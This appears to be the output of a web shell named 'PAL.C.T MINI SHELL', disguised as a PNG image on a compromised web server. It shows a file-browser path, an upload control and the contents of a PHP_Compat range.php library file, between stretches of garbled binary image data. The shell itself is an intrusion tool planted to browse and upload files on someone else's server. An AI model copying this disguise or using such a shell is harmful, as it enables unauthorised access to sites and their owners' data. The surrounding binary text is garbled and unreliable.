php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/gs/foto/php/Compat/Function/
upload
files >> /var/www/html/gs/foto/php/Compat/Function/range.php

<?php
/**
 * Replace range()
 *
 * @category    PHP
 * @package     PHP_Compat
 * @license     LGPL - http://www.gnu.org/licenses/lgpl.html
 * @copyright   2004-2007 Aidan Lister <aidan@php.net>, Arpad Ray <arpad@php.net>
 * @link        http://php.net/function.range
 * @author      Aidan Lister <aidan@php.net>
 * @version     $Revision: 269597 $
 * @since       PHP 5.0.0 (The optional step parameter was added in 5.0.0)
 * @require     PHP 4.0.0 (user_error)
 */
function php_compat_range($low, $high, $step = 1)
{ 
    $arr = array();
    $step = (abs($step) > 0) ? abs($step) : 1;
    $sign = ($low <= $high) ? 1 : -1;

    // Numeric sequence
    if (is_numeric($low) && is_numeric($high)) {
        for ($i = (float)$low; $i*$sign <= $high*$sign; $i += $step*$sign)
        $arr[] = $i;
    
    // Character sequence
    } else {
        if (is_numeric($low)) {
            return $this->range($low, 0, $step);
        }

        if (is_numeric($high)) {
            return $this->range(0, $high, $step);
        }

        $low = ord($low);
        $high = ord($high);
        for ($i = $low; $i * $sign <= $high * $sign; $i += $step * $sign) {
            $arr[] = chr($i);
        }
    }

    return $arr; 
}


// Define
if (!function_exists('range')) {
    function range($low, $high, $step = 1)
    { 
        return php_compat_range($low, $high, $step);
    }
}
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`